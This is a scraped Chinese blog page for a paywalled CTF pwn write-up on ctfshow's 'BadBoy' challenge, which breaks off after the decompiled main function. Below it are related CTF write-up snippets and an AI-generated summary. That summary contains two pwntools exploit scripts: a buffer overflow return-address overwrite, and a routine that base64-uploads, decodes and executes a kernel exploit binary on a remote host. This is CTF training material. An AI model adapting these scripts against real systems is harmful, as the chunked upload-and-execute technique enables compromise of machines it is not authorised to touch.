【pwn】ctfshow元旦水友赛--BadBoy

最新推荐文章于 2024-07-07 23:20:35 发布
原创 最新推荐文章于 2024-07-07 23:20:35 发布 · 1.8k 阅读 · 30 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #网络安全 #安全 #系统安全 #安全架构 #ctf #pwn

文章详细描述了一次针对程序的攻击过程,通过IDA分析发现只有一个main函数,利用缓冲区溢出进行内存泄露,获取libc地址和系统函数地址,最终实现getshell。作者使用了pwn库进行远程攻击并展示了完整的exploit代码。

首先先来看一下程序的保护情况

这里got表可改,没有开地址随机

接着看一下ida逻辑

很直接,只有一个main函数,一点点分析这段代码

buf[1] = __readfsqword(0x28u);
  init_func(argc, argv, envp);
  buf[0] = 'gfedcba';
  v5 = 0LL;
  while ( (_DWORD)kl )
  {
    puts("i am bad boy ");
    __iso

最低0.47元/天 解锁文章
GGb0mb
关注
2024ctfshow元旦水友 RE re_signin
Pisces50002的博客
01-07 886
41行 获取128个字符,v8算个长度,读入到回车就停止。对每一个字符,加上一个v7,再异或v7>>4,很简单的签到题,然而我把加密函数看花眼了。v6是用来记录上次的result。47行 比对密文,s2已经给出。主要函数部分可以直接看到。45行 生成了一个key。进encrypt看一下。
CTFshow元旦水友-web-easy include
jwkaaaaaa的博客
05-22 824
CTF元旦水友-web-easy include wp
[ctfshow 2023元旦水友]web题解
rev1ve的博客
01-05 3789
按照waf_in_waf_php对name的值进行waf以及waf_in_waf_php中的hint是base64,并且结合。简单点讲,就是我们先对我们的chu0的值进行加密也就是标记,然后拼接在一起后进行过滤器解析,利用最后的base64-decode无法解析前面ctfshowshowshowwww的垃圾字符被去除掉,而我们的chu0的值则会被正确解析并保留。有一个特性,当GET和POST有相同的变量时,匹配POST的变量,那么就可以同时传参GET和POST即可绕过,也就是POST传参数字。
【Web】CTFSHOW元旦水友部分wp
uuzeray的博客
01-02 4729
web一共5题,我出了3题,巧的是好像师傅们也只出了3题,跨年拿旗还是很快乐的,下面直接贴出自己的wp.
CTFshow元旦水友easy_include
qq_48932191的博客
01-20 1846
'1': 'localhost/tmp/sess_ctfshow',#php session以文件形式存储的默认路径,session文件默认命名方式是sess_'PHP_SESSION_UPLOAD_PROGRESS': '
CTFshow-pwn入门-前置基础pwn26-pwn28
你们de4月天的博客
06-20 1340
CTFshow-pwn入门-pwn26-pwn28
ctfshow [栈溢出]---pwn47
saulgoodman的博客
07-07 273
刷了一天快手了,起来做一道题锻炼一下脑子!
ctfshow-内部-签到
XYH_233的博客
03-30 2169
ctfshow-内部-签到
CTFshow-36D杯-pwn-babyheap
SCP000111的博客
04-11 903
参考博客https://www.xl-bit.cn/index.php/archives/15/ 再找wp的时候找了好久,终于找到该师傅的exp,希望后来人能有wp看。不过可能该师傅的博客解码有点问题,导致他的exp不能直接跑通。这里做了整理。 代码如下: 2022.4.11 证明可以跑通 from pwn import * def new(content): p.sendlineafter('>>','1') p.sendafter('your 36D:',content) def fre
2024年CentOS RHEL 系统更新安全补丁的方法_怎样升级red hat 补丁(2),网络安全音频面试
2401_84264244的博客
05-05 805
默认情况下, cron 任务被配置成了立即下载并安装所有更新,但是我们可以通过在 /etc/sysconfig/yum-cron 配置文件中把下面两个参数改为yes,从而改变这种行为。为了使来自 root@localhost 的通知能够通过邮件发送给同一账户(再次说明,你可以选择其他账户,如果你想这样的话),下面这些行也是必须的。安装完成以后,打开/etc/yum/yum-cron.conf,然后找到下面这些行内容,你必须确保它们的值和下面展示的一样。而其它的行保证了能够通知并自动下载、安装安全升级。
CTFshow元旦水友web部分题解
qq_34942239的博客
01-27 2402
Chu0_write:被创建时候,chu0被赋值为xiuxiuxiu,当Chu0_write被当作字符串使用时,如果chu0和chu1相等,content则为ctfshowshowshowww和get传参的chu0拼接后字符,如果name中的“base64”个数为1或者有其他方法,将content写入name.txt,其中name用get上传。get传参show_show.show,先后进行waf1 和waf2如果绕过正则,进行反序列化。可以看到能读取到文件,读取一些配置文件无果,尝试用pear文件包含。
ctfshow 元旦水友 月月的爱情故事(复现)
Altering_Ji的博客
01-03 2161
ctfshow元旦水友密码学第一题月月的爱情故事,摩斯密码和AES
ctfshow元旦水友 easy_web
m0_64016126的博客
01-03 2601
好家伙,过年都不让人好好过,为了一个flag硬是能折腾一天,记录一个对php://filter伪协议考的比较深的题,让我知道不能就知道个php://filter/read=convert.base64-encode/resource=flag.php了。关于php://filter伪协议我看了觉得比较详细两篇文章,放下面了。
[ctf.show 元旦水友 2024] crypto
weixin_52640415的博客
01-12 2025
random梅森旋转的state lucas定理Cn,m%p
ctfshow元旦水友 easy_web(进一步解释)
2301_80240388的博客
05-29 1498
刷题时看到有大佬已经有wp了,但其中有些东西并不能让我很好的理解,特写一篇文章来补全一下大佬wp#预期解法。
[ctf.show 元旦水友杯 2024] pwn复现
weixin_52640415的博客
01-16 1513
rtld_global link_map setcontext+3d orw
ctfshow元旦水友 misc 以假换真wp
Altering_Ji的博客
01-15 4241
ctfshow元旦水友misc第一题 以假换真wp 明文攻击 秒传原理md5碰撞
ctfshow元旦,easy_include
weixin_62306641的博客
01-06 1830
的时候没做出来,试了伪协议没想到文件包含。后看完wp才明白。
ctfshow元旦水友-badboy
fuiifiuiii的博客
02-25 498
6个字节足够泄露一个完整的地址,而三个字节不可以,由于需要将buf地址改为put_got的地址,所以一定要知道栈的地址,而3个字节已经足够libc的偏移地址。另:如果用远程打可以试着泄露下面的__libc_start_main,本地打通了,懒得再去打远程了。(至于为什么又加了一个,因为手动vmmap看libc载入地址的时候看错地方了,第一个才是载入地址,这里看成了第二个,所以多减了一次。地址分别相差0x18(24)和0x38(56),fd8-eb0=0x128(296)好久没打了,有人提到了,就看一看。
ctfshow-pwn题wp
最新发布
09-17
CTFShow平台PWN题的解题思路和过程在不同题目中有所不同。以CTFSHOW PWN02为例,解题脚本通过`pwn`库进行操作。脚本根据`contect`变量的值来选择是本地运行程序还是远程连接目标服务器。构造了长度为13个字节的`a`字符的`payload`,并拼接上函数地址`0X804850F`,将其发送给目标程序,最后进入交互模式与程序进行交互,可能是通过溢出覆盖返回地址来执行指定函数,以达到解题目的[^1]。 对于CTFShow PWN入门的Kernel PWN 356 - 360相关题目,解题脚本先将本地的`exp`文件内容进行Base64编码,然后分块发送到远程服务器上的`/tmp/b64_exp`文件中。接着将Base64编码的内容解码成可执行文件`/tmp/exploit`,为其添加执行权限,最后执行该文件并进入交互模式。该过程可能是利用内核漏洞,通过上传并执行本地编写的漏洞利用脚本,来获取远程服务器的控制权[^3]。 ### 代码示例 CTFSHOW PWN02解题脚本: ```python from pwn import * contect = 1 def main(): if contect == 0: p = process("./stack") else: p = remote("pwn.challenge.ctf.show", 28103) payload = b'a' * 13 payload += p32(0X804850F) p.sendline(payload) p.interactive() main() ``` CTFShow PWN入门Kernel PWN相关题目的解题脚本: ```python from pwn import * import base64 context.log_level = "debug" with open("./exp", "rb") as f: exp = base64.b64encode(f.read()) p = remote("pwn.challenge.ctf.show", 28304) p.recvuntil(b"$ ") p.sendline(b"ls") count = 0 for i in range(0, len(exp), 0x200): p.recvuntil(b"/ $ ") p.sendline("echo -n \"" + exp[i:i + 0x200].decode() + "\" >> /tmp/b64_exp") count += 1 log.info("count: " + str(count)) p.sendline("cat /tmp/b64_exp | base64 -d > /tmp/exploit") p.sendline("chmod +x /tmp/exploit") p.sendline("/tmp/exploit ") p.interactive() ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值